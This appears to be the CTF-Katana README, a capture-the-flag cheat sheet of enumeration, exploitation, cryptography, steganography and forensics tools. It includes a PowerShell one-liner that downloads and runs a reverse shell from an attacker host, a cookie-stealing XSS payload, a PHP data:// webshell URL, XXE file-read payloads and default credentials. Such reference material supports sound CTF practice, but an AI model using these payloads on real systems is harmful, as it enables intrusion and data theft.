CTF-Katana

John Hammond | February 1st, 2018


This repository, at the time of writing, will just host a listing of tools and commands that may help with CTF challenges. I hope to keep it as a "live document," and ideally it will not die out like the old "tools" page I had made (https://github.com/USCGA/tools).

The formal tool that automates some of this low-hanging fruit checking is finally released. Katana is available at https://github.com/JohnHammond/katana. Pull-requests and contributions are welcome!


Table of Contents

  1. Post-Exploitation
  2. Port Enumeration
  3. 445 (smb/Samba)
  4. 1433 (Microsoft SQL Server)
  5. SNMP
  6. Microsoft Office Macros
  7. Retrieving Network Service Hashes
  8. Windows Reverse Shells
  9. Known Exploits
  10. Excess
  11. Esoteric Languages
  12. Steganography
  13. Cryptography
  14. Networking
  15. PHP
  16. PDF Files
  17. Forensics
  18. PNG File Forensics
  19. APK Forensics
  20. Web
  21. Reverse Engineering
  22. PowerShell
  23. Windows Executables
  24. Python Reversing
  25. Binary Exploitation/pwn
  26. VisualBasicScript Reversing
  27. Miscellaneous
  28. Jail Breaks
  29. Trivia

Post-Exploitation

  • static-binaries

    If you need to use a program that is not on the box you just broke into, try and build a static binary! I've seen this used on Fatty for HackTheBox, getting a pty with the typical python -c 'import pty...' trick when it didn't have Python originally!

    https://github.com/andrew-d/static-binaries

Port Enumeration

445 (smb/Samba)

  • smbmap

    smbmap tells you permissions and access, which smbclient does not do!

    To try and list shares as the anonymous user DO THIS (this doesn't always work for some weird reason)

smbmap -H 10.10.10.125 -u anonymous

Or you can attempt just:

smbmap -H 10.10.10.125

And you can specify a domain like so:

smbmap -H 10.10.10.125 -u anonymous -d HTB.LOCAL

Worth trying localhost as a domain, if that gets "NO_LOGON_SERVERS"

smbmap -H 10.10.10.125 -u anonymous -d localhost
  • enum4linux
enum4linux 10.10.10.125
  • smbclient

    NOTE: DEPENDING ON THE VERSION OF SMBCLIENT YOU ARE USING, you may need to SPECIFY the use of S<B version 1 or SMB version 2. You can dp this with -m SMB2. Older versions of SMBclient (latest being 4.10 at the time of writing) use SMB1 by default.

    You can use smbclient to look through files shared with SMB. To list available shares:

smbclient -m SMB2 -N -L //10.10.10.125/

Once you find a share you want to/can access, you can connect to shares by using the name following the locator:

smbclient -m SMB2 -N //10.10.10.125/Reports

You will see a smb: \> prompt, and you can use ls and get to retrieve files or even put if you need to place files there.

1433 (Microsoft SQL Server)

  • impacket -> mssqlclient.py

    You can connect to a Microsoft SQL Server with myssqlclient.py knowing a username and password like so:

mssqlclient.py username@10.10.10.125

It will prompt you for a password. If your password fails, the server might be using "Windows authentication", which you can use with:

mssqlclient.py username@10.10.10.125 -windows-auth

If you have access to a Micosoft SQL Server, you can try and enable_xp_cmdshell to run commands. With mssqlclient.py you can try:

SQL> enable_xp_cmdshell

though, you may not have permission. If that DOES succeed, you can now run commands like:

SQL> xp_cmdshell whoami

SNMP

  • snmp-check
snmp-check 10.10.10.125

Microsoft Office Macros

  • oletools -> olevba

    olevba can look for Macros within office documents (which you should always check) with just supplying the filename:

olevba "Currency Volume Report.xlsm"

Retrieving Network Service Hashes

./Responder.py -I tun0

Windows Reverse Shells

  • Nishang

    If you have access to PowerShell, you can get a Reverse shell by using nishang's Invoke-PowerShellTcp.ps1 script inside of the Shells directory. Be sure to add the function call example to the bottom of your script, so all you need to to do to host it is (on your Attacker machine):

python -m SimpleHTTPServer

and then on the victim machine:

powershell IEX( New-Object Net.WebClient).DownloadString("http://10.10.14.6:8000/reverse.ps1") )

Also, if you want to have nice up and down arrow key usage within your Windows reverse shell, you can use the utility rlwrap before your netcat listener command.

rlwrap nc -lnvp 9001

Known Exploits

  • Java RMI

    Metasploit module: exploit/multi/misc/java_rmi_server

    When testing this, responses are known to come back with an error or exception. Your code MAY VERY WELL still be executing. Try and run commands that include a callback. And use Python to live off the land and try avoid special characters, like | pipes! ysoserial is a good tool for deserializing Java code to take advantage of this vulnerability.

  • Heartbleed

    Metasploit module: auxiliary/scanner/ssl/openssl_heartbleed

    Be sure to use set VERBOSE true to see the retrieved results. This can often contain a flag or some valuable information.

  • libssh - SSH

    libssh0.8.1 (or others??) is vulnerable to an easy and immediate login. Metasploit module: auxiliary/scanner/ssh/libssh_auth_bypass. Be sure to set spawn_pty true to actually receive a shell! Then sessions -i 1 to interact with the shell spawned (or whatever appropriate ID)

  • Bruteforcing RDP

    Bruteforcing RDP with hydra or ncrack is NOT ALWAYS ADVISABLE because of Cred-SSB. An option might be to script xrdp to automate against a password or word list... but THIS IS NOT TESTED.

  • Apache Tomcat

    If you can determine that you are working with an Apache Tomcat server (usually by visiting pages that do not exist and seeing a 404 error message), try to visit /Manager, which is usually accessible on Tomcat. Possible credentials could be tomcat:tomcat, tomcat:s3cr3t, admin:s3cr3t, root:s3cr3t, etc. etc.. Worthy of bruteforcing with hydra.

    If you see URLs are appended with a .action (not a .do), you may be working with Apache Struts.

  • Apache Struts

    To identify the Apache Struts version is running,

Excess

  • wifite2

    Brute-force a Wi-Fi access point.

  • impacket

    Tool to quickly spin up a Samba share.

  • enum4linux

    Script to scan Windows Samba shares. VERY GOOD TO RUN FOR WINDOWS ENUMERATION.

  • drupalgeddon2

    Attack script for old or outdated Drupal servers. Usually very effective.

Esoteric Languages

  • Try It Online

    An online tool that has a ton of Esoteric language interpreters.

  • Brainfuck

    This language is easily detectable by its huge use of plus signs, braces, and arrows. There are plenty of online interpreters, like this one: https://copy.sh/brainfuck/ Some example code:

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.--.--------------.+++++++++++++.----.-----------
--.++++++++++++.--------.<------------.<++.>>----.+.<+++++++++++.+++++++++++++.>+++++++++++++++++.-------------
--.++++.+++++++++++++++.<<.>>-------.<+++++++++++++++.>+++..++++.--------.+++.<+++.<++++++++++++++++++++++++++
.<++++++++++++++++++++++.>++++++++++++++..>+.----.>------.+++++++.--------.<+++.>++++++++++++..-------.++.
  • COW

    This language is easily identified by numerous "MOO" statements and random capitalization. It has an option on https://tio.run/ Some example code:

 MoO moO MoO mOo MOO OOM MMM moO moO
 MMM mOo mOo moO MMM mOo MMM moO moO
 MOO MOo mOo MoO moO moo mOo mOo moo
  • Malboge

    An esoteric language that looks a lot like Base85... but isn't. Often has references to "Inferno" or "Hell" or "Dante." Online interpreters like so: http://www.malbolge.doleczek.pl/ Some example code:

(=<`#9]~6ZY32Vx/4Rs+0No-&Jk)"Fh}|Bcy?`=*z]Kw%oG4UUS0/@-ejc(:'8dc
  • Piet

    A graphical programming language... looks like large 8-bit pixels in a variety of colors. Can be interpreted with the tool npiet

https://www.bertnase.de/npiet/hi.png

Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook! Ook? Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook? Ook! Ook! Ook? Ook! Ook? Ook.
Ook! Ook. Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook! Ook? Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook?
Ook! Ook! Ook? Ook! Ook? Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Midnight takes your heart and your soul
While your heart is as high as your soul
Put your heart without your soul into your heart

Give back your heart


Desire is a lovestruck ladykiller
My world is nothing
Fire is ice
Hate is water
Until my world is Desire,
Build my world up
If Midnight taking my world, Fire is nothing and Midnight taking my world, Hate is nothing
Shout "FizzBuzz!"
Take it to the top

If Midnight taking my world, Fire is nothing
Shout "Fizz!"
Take it to the top

If Midnight taking my world, Hate is nothing
Say "Buzz!"
Take it to the top

Whisper my world

Steganography

  • StegCracker

    Don't ever forget about steghide! This tool can use a password list like rockyou.txt with steghide. SOME IMAGES CAN HAVE MULTIPLE FILED ENCODED WITH MULTIPLE PASSWORDS.

  • Steganography Online

    A tool often used in CTFs for encoding messages into images.

  • StegSeek

    This is similar to stegcracker, but much faster. Can also extract metadata without a password list.

  • steg_brute.py

    This is similar to stegcracker above.

  • openstego

    A Java .JAR tool, that can extract data from an image. A good tool to use on guessing challenges, when you don't have any other leads. We found this tool after the Misc50 challenge from HackIM 2018

  • Stegsolve.jar

    A Java .JAR tool, that will open an image and let you as the user arrow through different renditions of the image (viewing color channels, inverted colors, and more). The tool is surprisingly useful.

  • steghide

    A command-line tool typically used alongside a password or key, that could be uncovered some other way when solving a challenge.

  • stepic

    Python image steganography. Stepic hides arbitrary data inside PIL images. Download it here: http://domnit.org/stepic/doc/

  • Digital Invisible Ink Stego Tool

    A Java steganography tool that can hide any sort of file inside a digital image (regarding that the message will fit, and the image is 24 bit colour)

WHEN GIVEN A FILE TO WORK WITH, DO NOT FORGET TO RUN THIS STEGHIDE WITH AN EMPTY PASSWORD!

mplayer -af scaletempo -speed 64 flag.mp3
  • DNA Codes

    When given a sequence with only A, C, G, T , there is an online mapping for these. Try this:

    img/dna_codes.png img/genome_coding.jpg

  • Extract Thumbnail (data is covered in original image)

    If you have an image where the data you need is covered, try viewing the thumbnail:

exiftool -b -ThumbnailImage my_image.jpg > my_thumbnail.jpg
  • snow

    A command-line tool for whitespace steganography (see above).

  • SONIC Visualizer (audio spectrum)

    Some classic challenges use an audio file to hide a flag or other sensitive stuff. SONIC visualizer easily shows you spectrogram. If it sounds like there is random bleeps and bloops in the sound, try this tactic!

  • Detect DTMF Tones

    Audio frequencies common to a phone button, DTMF: https://en.wikipedia.org/wiki/Dual-tone_multi-frequency_signaling.

  • Phone-Keypad

    Some messages may be hidden with a string of numbers, but really be encoded with old cell-phone keypads, like text messaging with numbers repeated:

https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQSySxHjMFv80XWp74LZpfrnAro6a1MLqeF1F3zpguA5PGSW9ov

  • hipshot

    A Python module to compress a video into a single standalone image, simulating a long-exposure photograph. Was used to steal a QR code visible in a video, displayed through "Star Wars" style text motion.

  • QR code

    A small square "barcode" image that holds data.

  • zbarimg

    A command-line tool to quickly scan multiple forms of barcodes, QR codes included. Installed like so on a typical Ubuntu image:

sudo apt install zbar-tools
  • Punctuation marks !, . and ?

    I have seen some challenges use just the end of . or ? or ! to represent the Ook esoteric programming language. Don't forget that is a thing!

Cryptography

  • Cryptii

    https://cryptii.com has multiple decoding tools like base64, Ceaser Cipher, ROT13, Vigenère Cipher and more.

  • Keyboard Shift

    https://www.dcode.fr/keyboard-shift-cipher If you see any thing that has the shape of a sentence but it looks like nonsense letters, and notes some shift left or right, it may be a keyboard shift...

  • Bit Shift

    Sometimes the letters may be shifted by a stated hint, like a binary bit shift ( x >> 1 ) or ( x << 1 ).

  • Reversed Text

    Sometimes a "ciphertext" is just as easy as reversed text. Don't forgot to check under this rock! You can reverse a string in Python like so:

"UOYMORFEDIHOTGNIYRTEBTHGIMFTCA.TAHTTERCESASISIHT"[::-1]
  • XOR

    ANY text could be XOR'd. Techniques for this are Trey's code, and XORing the data against the known flag format. Typically it is given in just hex, but once it is decoded into raw binary data, it gives it keeps it's hex form (as in \xde\xad\xbe\xef etc..) Note that you can do easy XOR locally with Python like so (you need pwntools installed):

    python >>> import pwn; pwn.xor("KEY", "RAW_BINARY_CIPHER")
    

IF YOU KNOW A DECENT CRIB (PLAINTEXT), USE CYBERCHEF TO HELP DETERMINE THE KEY

DO NOT FORGET TO JUST BRUTEFORCE JUST THE FIRST BYTE, OR TWO BYTES OR THREE BYTES.

  • Caesar Cipher

    The most classic shift cipher. Tons of online tools like this: https://www.dcode.fr/caesar-cipher or use caesar as a command-line tool (sudo apt install bsdgames) and you can supply a key for it. Here's a one liner to try all letter positions:

    cipher='jeoi{geiwev_gmtliv_ws_svmkmrep}' ; for i in {0..25}; do echo $cipher | caesar $i; done
    

    Be aware! Some challenges include punctuation in their shift! If this is the case, try to a shift within all 255 ASCII characters, not just 26 alphabetical letters!

  • caesar

    A command-line caesar cipher tool (noted above) found in the bsdgames package.

  • Atbash Cipher

    If you have some text that you have no idea what it is, try the Atbash cipher! It's a letter mapping, but the alphabet is reversed: like A maps to Z, B maps to Y and so on. There are tons of online tools to do this (http://rumkin.com/tools/cipher/atbash.php), and you can build it with Python.

  • Vigenere Cipher

    http://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx, https://www.guballa.de/vigenere-solver and personal Python code here: https://pastebin.com/2Vr29g6J

  • Gronsfeld Cipher

    A variant of the Vignere cipher that uses numbers insteads of letters. http://rumkin.com/tools/cipher/gronsfeld.php

  • Beaufourt Cipher

    https://www.dcode.fr/beaufort-cipher

  • Bacon Cipher

    A substitution cipher that replaces each character with five characters from a set of two (A and B is used most of the time). If we look at A as 0 and B as 1 it is a special encoding to binary numbers, where the character A has the value of binary b00000. Easy to recognize, because the ciphertext only contains two characters (e.g.: A and B) and the length of the ciphertext is divisible by 5. Example: AAABB AAABA ABBAB AAABB AABAA AAAAB AAAAA AAABA ABBAB ABBAA.

      [Online tool](http://rumkin.com/tools/cipher/baconian.php)
    
  • Python random module cracker/predictor

    https://github.com/tna0y/Python-random-module-cracker... helps attack the Mersenne Twister used in Python's random module.

  • Transposition Cipher

  • RSA: Classic RSA

    Variables typically given: n, c, e. ALWAYS try and give to http://factordb.com. If p and q are able to be determined, use some RSA decryptor; handmade code available here: https://pastebin.com/ERAMhJ1v

  • RSA: Multi-prime RSA

    When you see multi-prime RSA, you can use calculate phi by still using all the factors.

phi = (a - 1) * (b - 1) * (c - 1)    # ... etcetera

If FactorDB cannot find factors, try alpertron: https://www.alpertron.com.ar/ECM.HTM

  • RSA: e is 3 (or small)

    If e is 3, you can try the cubed-root attack. If you the cubed root of c, and if that is smaller than the cubed root of n, then your plaintext message m is just the cubed root of c! Here is Python code to take the cubed root:

def root3rd(x):
    y, y1 = None, 2
    while y!=y1:
        y = y1
        y3 = y**3
        d = (2*y3+x)
        y1 = (y*(y3+2*x)+d//2)//d
    return y

https://www.marvindisplay.com/images/SignalFlags.gif

  • Daggers Cipher

The daggers cipher is another silly text-to-image encoder. This is the key, and you can find a decoder on https://www.dcode.fr/daggers-alphabet.

img/dagger_cipher.png

  • Hylian Language (Twilight Princess)

The Hylian language is another silly text-to-image encoder. This is the key, and you can find a decoder on https://www.dcode.fr/hylian-language-twilight-princess.

img/hylian.png

  • Hylian Language (Breath of the Wild)

The Hylian language is another silly text-to-image encoder. This is the key, and you can find a decoder on https://www.dcode.fr/hylian-language-breath-of-the-wild.

img/botw.jpg

  • Sheikah Language (Breathe of the Wild)

The Sheikah language is another silly text-to-image encoder. This is the key, and you can find a decoder on https://www.dcode.fr/sheikah-language.

img/sheikah.png

  • Hexahue Alphabet

The hexhue is an another tex-to-image enocder. you can find a decoder on https://www.boxentriq.com/code-breaking/hexahue

img

Networking

  • Wireshark

    The go-to tool for examining .pcap files.

  • Network Miner

    Seriously cool tool that will try and scrape out images, files, credentials and other goods from PCAP and PCAPNG files.

  • PCAPNG

    Not all tools like the PCAPNG file format... so you can convert them with an online tool http://pcapng.com/ or from the command-line with the editcap command that comes with installing Wireshark:

editcap old_file.pcapng new_file.pcap
  • tcpflow

    A command-line tool for reorganizing packets in a PCAP file and getting files out of them. Typically it gives no output, but it creates the files in your current directory!

tcpflow -r my_file.pcap
ls -1t | head -5 # see the last 5 recently modified files
  • PcapXray

    A GUI tool to visualize network traffic.

PHP

  • Magic Hashes

    A common vulnerability in PHP that fakes hash "collisions..." where the == operator falls short in PHP type comparison, thinking everything that follows 0e is considered scientific notation (and therefore 0). More valuable info can be found here: https://github.com/spaze/hashes, but below are the most common breaks.

PlaintextMD5 Hash
2406107080e462097431906509019562988736854
QLTHNDT0e405967825401955372549139051580
QNKCDZO0e830400451993494058024219903391
PJNPDWY0e291529052894702774557631701704
NWWKITQ0e763082070976038347657360817689
NOOPCJF0e818888003657176127862245791911
MMHUWUV0e701732711630150438129209816536
MAUXXQC0e478478466848439040434801845361
IHKFRNS0e256160682445802696926137988570
GZECLQZ0e537612333747236407713628225676
GGHMVOE0e362766013028313274586933780773
GEGHBXL0e248776895502908863709684713578
EEIZDOI0e782601363539291779881938479162
DYAXWCA0e424759758842488633464374063001
DQWRASX0e742373665639232907775599582643
BRTKUJZ00e57640477961333848717747276704
ABJIHVY0e755264355178451322893275696586
aaaXXAYW0e540853622400160407992788832284
aabg7XSs0e087386482136013740957780965295
aabC9RqS0e041022518165728065344349536299
0e2159620170e291242476940776845150308577824
PlaintextSHA1 Hash
aaroZmOk0e66507019969427134894567494305185566735
aaK1STfY0e76658526655756207688271159624026011393
aaO8zKZF0e89257456677279068558073954252716165668
aa3OFF9m0e36977786278517984959260394024281014729
PlaintextMD4 Hash
bhhkktQZ0e949030067204812898914975918567
0e0012333333333333345577788890e434041524824285414215559233446
0e000001112223333336667888888890e641853458593358523155449768529
00012356666666888888888880e832225036643258141969031181899
http://xqi.cc/index.php?m=php://filter/convert.base64-encode/resource=index
  • data://text/plain;base64

    A PHP stream that can be taken advantage of if used and evaluated as an include resource or evaluated. Can be used for RCE: check out this writeup: https://ctftime.org/writeup/8868 ... TL;DR:

http://103.5.112.91:1234/?cmd=whoami&page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=

PDF Files

  • pdfinfo

    A command-line tool to get a basic synopsis of what the PDF file is.

  • pdfcrack

    A comand-line tool to recover a password from a PDF file. Supports dictionary wordlists and bruteforce.

  • pdfimages

    A command-line tool, the first thing to reach for when given a PDF file. It extracts the images stored in a PDF file, but it needs the name of an output directory (that it will create for) to place the found images.

  • pdfdetach

    A command-line tool to extract files out of a PDF.

Forensics

  • Python bytecode uncompyle6

    To decompile bytecode, use uncompyle6. There is one special argument (I think -d or something???) that can have success if the default operation does not work. Do not give up hope when working with obvious Python bytecode. EasyPythonDecompiler might work, or perhaps testing with uncompyle

  • Keepass

    keepassx can be installed on Ubuntu to open and explore Keepass databases. Keepass databases master passwords can be cracked with keepass2john.

  • Magic Numbers

    The starting values that identify a file format. These are often crucial for programs to properly read a certain file type, so they must be correct. If some files are acting strangely, try verifying their magic number with a trusted list of file signatures.

  • hexed.it

    An online tool that allows you to modify the hexadecimal and binary values of an uploaded file. This is a good tool for correcting files with a corrupt magic number

  • dumpzilla

    A Python script to examine a .mozilla configuration file, to examine downloads, bookmarks, history or bookmarks and registered passwords. Usage may be as such:

python dumpzilla.py .mozilla/firefox/c3a958fk.default/ --Downloads --History --Bookmarks --Passwords
  • Repair image online tool

    Good low-hanging fruit to throw any image at: https://online.officerecovery.com/pixrecovery/

  • foremost

    A command-line tool to carve files out of another file. Usage is foremost [filename] and it will create an output directory.

sudo apt install foremost
  • binwalk

    A command-line tool to carve files out of another file. Usage to extract is binwalk -e [filename] and it will create a _[filename]_extracted directory.

	sudo apt install binwalk
  • hachoir-subfile

    A command-line tool to carve out files of another file. Very similar to the other tools like binwalk and foremost, but always try everything!

  • TestDisk

    A command-line tool, used to recover deleted files from a file system image. Handy to use if given a .dd and .img file etc.

  • photorec

    Another command-line utility that comes with testdisk. It is file data recovery software designed to recover lost files including video, documents and archives from hard disks, CD-ROMs, and lost pictures (thus the Photo Recovery name) from digital camera memory. PhotoRec ignores the file system and goes after the underlying data, so it will still work even if your media's file system has been severely damaged or reformatted.

  • [Analysis Image] ['https://29a.ch/photo-forensics/#forensic-magnifier']

    Forensically is free online tool to analysis image this tool has many features like Magnifier, Clone Detection, Error Level analysis, Noise Analusis, level Sweep, Meta Data, Geo tags, Thumbnail Analysis , JPEG Analysis, Strings Extraction.

PNG File Forensics

  • pngcheck

    A command-line tool for "checking" a PNG image file. Especially good for verifying checksums.

  • pngcsum

    Correct the CRC on all of the parts of a PNG image file.

  • https://github.com/sherlly/PCRT

    Utility to try and correct a PNG file. NOTE... this will NOT SAVE your file as new one. YOU HAVE TO SHOW the file (enter y when using the script]) to actually view the new image.

APK Forensics

  • apktool

    A command-line tool to extract all the resources from an APK file. Usage:

apktool d <file.apk>
  • dex2jar

    A command-line tool to convert a J.dex file to .class file and zip them as JAR files.

  • jd-gui

    A GUI tool to decompile Java code, and JAR files.

Web

  • robots.txt

    This file tries to hide webpages from web crawlers, like Google or Bing or Yahoo. A lot of sites try and use this mask sensitive files or folders, so it should always be some where you check during a CTF. http://www.robotstxt.org/

  • Edit This Cookie

    A web browser plug-in that offers an easy interface to modifying cookies. THIS IS OFTEN OVERLOOKED, WITHOUT CHANGING THE VALUE OF THE COOKIES... BE SURE TO FUZZ EVERYTHING, INCLUDING COOKIE VALUES!

  • Backup pages ( ~ and .bak and .swp )

    Some times you may be able to dig up an old version of a webpage (or some PHP source code!) by adding the usual backup suffixes. A good thing to check!

  • /admin/

    This directory is often found by directory scanning bruteforce tools, so I recommend just checking the directory on your own, as part of your own "low-hanging fruits" check.

  • /.git/

    A classic CTF challenge is to leave a git repository live and available on a website. You can see this with nmap -A (or whatever specific script catches it) and just by trying to view that specific folder, /.git/. A good command-line tool for this is GitDumper.sh, or just simply using wget.

    Sometimes you might Bazaar or Mercurial or other distributed version control systems. You can use https://github.com/kost/dvcs-ripper for those!!

  • GitDumper.sh

    A command-line tool that will automatically scrape and download a git repository hosted online with a given URL.

  • Bazaar .bzr

    If you see a publically accessible .bzr directory, you can use bzr branch http://site output-directory to download it. Or, use this utility: https://github.com/kost/dvcs-ripper

  • XSS/Cross-site scripting

    XSS Filter Evasion Cheat Sheet. Cross-site scripting, vulnerability where the user can control rendered HTML and ideally inject JavaScript code that could drive a browser to any other website or make any malicious network calls. Example test payload is as follows:

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
Typically you use this to steal cookies or other information, and you can do this with an online requestbin.
<img src="#" onerror="document.location='http://requestbin.fullcontact.com/168r30u1?c' + document.cookie">
  • new usefull XSS cheat sheet : 'https://portswigger.net/web-security/cross-site-scripting/cheat-sheet'

  • CloudFlare Bypass

    If you need to script or automate against a page that uses the I'm Under Attack Mode from CloudFlare, or DDOS protection, you can do it like this with linked Python module.

#!/usr/bin/env python

import cfscrape

url = 'http://yashit.tech/tryharder/'

scraper = cfscrape.create_scraper()
print scraper.get(url).content
  • XSStrike

    A command-line tool for automated XSS attacks. Seems to function like how sqlmap does.

  • wpscan

    • A Ruby script to scan and do reconnaissance on a Wordpress application.
  • Mac AutoLogin Password Cracking

Sometimes, given an Mac autologin password file /etc/kcpassword, you can crack it with this code:

def kcpasswd(ciphertext):
    key = '7d895223d2bcddeaa3b91f'
    while len(key) < (len(ciphertext)*2):
        key = key + key
    key = binasciiunhexlify(key)
    result = ''
    for i in range(len(ciphertext)):
        result += chr(ord(ciphertext[i]) ^ (key[i]))
    return result
  • XXE : XML External Entity

An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities. XML entities can be used to tell the XML parser to fetch specific content on the server. We try to display the content of the file /flag :

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///flag">
]>
<data>&file;</data>

<?xml version="1.0" encoding="UTF-16"?>
  <!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///flag" >]><foo>&xxe;</foo>

Get MongoDB properly installed:

sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv 9DA31620334BD75D9DCB49F368818C72E52529D4
echo "deb [ arch=amd64,arm64 ] https://repo.mongodb.org/apt/ubuntu xenial/mongodb-org/4.0 multiverse" | sudo tee /etc/apt/sources.list.d/mongodb-org-4.0.list
sudo apt-get update
sudo apt-get install -y mongodb-org

Connect to a remote server with credentials:

mongo --username 'uname' -p 'pword' --host hostname.com:27017

Print out the database info:

show databases

use <databasename>

show collections

c = db.<collectioname>

c.find()

  • gobuster

  • DirBuster

  • nikto

  • Burpsuite

  • AWS / S3 Buckets

    You can try and dump an AWS bucket like so. The --no-sign-request avoids the need for credentials, and --recursive will grab everything possible.

aws s3 cp --recursive --no-sign-request s3://<bucket_name> .
i. e. `aws s3 cp --recursive --no-sign-request s3://tamuctf .`

Reverse Engineering

  • ltrace and strace

    Easy command-line tools to see some of the code being executed as you follow through a binary. Usage: ltrace ./binary

  • Hopper

    Hopper Disassembler, the reverse engineering tool that lets you disassemble, decompile and debug your applications.

  • Binary Ninja

    Clean and easy with multithreaded analysis. Support multiple architectures, platforms, and compilers.

  • gdb

    Fast and powerful debugger for UNIX system. More powerful if this tool is equipped with PEDA.

  • IDA

    It's one of popular debugger and disassembler tool with rich of features, cross platform, multi-processor disassembler.

  • radare2

    Portable tool for hex editor, binary analysis, disassembler, debugger, etc.

  • Ghidra

    New RE tool developed by NSA with the same feature as IDA

  • Compiling & running ASM code:

    You can convert ASM functions from assembly and run them as C functions like the following:

    asm4.S

    .intel_syntax noprefix
    .global asm4
    asm4:
    	push   ebp
    	mov    ebp,esp
    	push   ebx
    	sub    esp,0x10
    	mov    DWORD PTR [ebp-0x10],0x27d
    	mov    DWORD PTR [ebp-0xc],0x0
    	jmp    label2
    label1:
    	add    DWORD PTR [ebp-0xc],0x1
    label2:
    	mov    edx,DWORD PTR [ebp-0xc]
    	mov    eax,DWORD PTR [ebp+0x8]
    	add    eax,edx
    	movzx  eax,BYTE PTR [eax]
    	test   al,al
    	jne    label1
    	mov    DWORD PTR [ebp-0x8],0x1
    	jmp    label3
    label4:
    	mov    edx,DWORD PTR [ebp-0x8]
    	mov    eax,DWORD PTR [ebp+0x8]
    	add    eax,edx
    	movzx  eax,BYTE PTR [eax]
    	movsx  edx,al
    	mov    eax,DWORD PTR [ebp-0x8]
    	lea    ecx,[eax-0x1]
    	mov    eax,DWORD PTR [ebp+0x8]
    	add    eax,ecx
    	movzx  eax,BYTE PTR [eax]
    	movsx  eax,al
    	sub    edx,eax
    	mov    eax,edx
    	mov    edx,eax
    	mov    eax,DWORD PTR [ebp-0x10]
    	lea    ebx,[edx+eax*1]
    	mov    eax,DWORD PTR [ebp-0x8]
    	lea    edx,[eax+0x1]
    	mov    eax,DWORD PTR [ebp+0x8]
    	add    eax,edx
    	movzx  eax,BYTE PTR [eax]
    	movsx  edx,al
    	mov    ecx,DWORD PTR [ebp-0x8]
    	mov    eax,DWORD PTR [ebp+0x8]
    	add    eax,ecx
    	movzx  eax,BYTE PTR [eax]
    	movsx  eax,al
    	sub    edx,eax
    	mov    eax,edx
    	add    eax,ebx
    	mov    DWORD PTR [ebp-0x10],eax
    	add    DWORD PTR [ebp-0x8],0x1
    label3:
    	mov    eax,DWORD PTR [ebp-0xc]
    	sub    eax,0x1
    	cmp    DWORD PTR [ebp-0x8],eax
    	jl     label4
    	mov    eax,DWORD PTR [ebp-0x10]
    	add    esp,0x10
    	pop    ebx
    	pop    ebp
    	ret
    

    asm4.c

    #include<stdio.h>
    extern int asm4(char* s);
    
    int main(){
        char *str = "picoCTF_d899a";
        printf("%X", asm4(str));
        return 0;
    }
    

    bash

    $ gcc -m32 -o a asm4.c asm4.S
    $ ./a
    

PowerShell

  • nishang

    A PowerShell suite of tools for pentesting. Has support for an ICMP reverse shell!

  • Empire

    HUGE PowerShell library and tool to do a lot of post-exploitation.

  • Bypass AMSI Anti-Malware Scan Interface

    Great tool and guide for anti-virus evasion with PowerShell.

Windows Executables

Python Reversing

  • Easy Python Decompiler

    A small .exe GUI application that will "decompile" Python bytecode, often seen in .pyc extension. The tool runs reliably on Linux with Wine.

  • Pyinstaller Extractor

    PyInstaller Extractor is a Python script to extract the contents of a PyInstaller generated Windows executable file. The contents of the pyz file (usually pyc files) present inside the executable are also extracted. Usage is python3 pyinstxtractor.py <filename>. We can later decompile the bytecode in .pyc using uncompyle6

Binary Exploitation/pwn

  • Basic Stack Overflow

    Use readelf -s <binary> to get the location of a function to jump to -- overflow in Python, find offset with dmesg, and jump.

  • printf vulnerability

    A C binary vulnerability, where printf is used with user-supplied input without any arguments. Hand-made code to exploit and overwrite functions: https://pastebin.com/0r4WGn3D and a video walkthrough explaining: https://www.youtube.com/watch?v=t1LH9D5cuK4

  • formatStringExploiter

    A good Python module to streamline exploiting a format string vulnerability. THIS IS NOT ALWAYS A GOOD TACTIC...

  • 64-bit Buffer Overflow

    64-bit buffer overflow challenges are often difficult because the null bytes get in the way of memory addresses (for the function you want to jump to, that you can usually find with readelf -s). But, check if whether or not the function address you need starts with the same hex values already on the stack (in rsp). Maybe you only have to write two or three bytes after the overflow, rather than the whole function address.

Miscellaneous

  • Payload All The Things

    Super useful repo that has a payload for basically every sceario

  • Punchcards(/Punch cards)

    Sometimes it sucks to do these manually, but you can here: http://tyleregeto.com/article/punch-card-emulator

  • GameBoy ROMS

    You have options to run GameBoy ROMs... one is using VisualBoyAdvance, the oher is RetroArch (which is supposedly better):

# VisualBoyAdvance
sudo add-apt-repository universe
sudo apt install visualboyadvance

# RetroArch
sudo add-apt-repository ppa:libretro/stable && sudo apt-get update && sudo apt-get install -y retroarch* libretro-*
Base64:
TWFuIGlzIGRpc3Rpbmd1aXNoZWQsIG5vdCBvbmx5IGJ5IGhpcyByZWFzb24sIGJ1dCBieSB0aGlz
IHNpbmd1bGFyIHBhc3Npb24gZnJvbSBvdGhlciBhbmltYWxzLCB3aGljaCBpcyBhIGx1c3Qgb2Yg
dGhlIG1pbmQsIHRoYXQgYnkgYSBwZXJzZXZlcmFuY2Ugb2YgZGVsaWdodCBpbiB0aGUgY29udGlu
dWVkIGFuZCBpbmRlZmF0aWdhYmxlIGdlbmVyYXRpb24gb2Yga25vd2xlZGdlLCBleGNlZWRzIHRo
ZSBzaG9ydCB2ZWhlbWVuY2Ugb2YgYW55IGNhcm5hbCBwbGVhc3VyZS4=
Base32
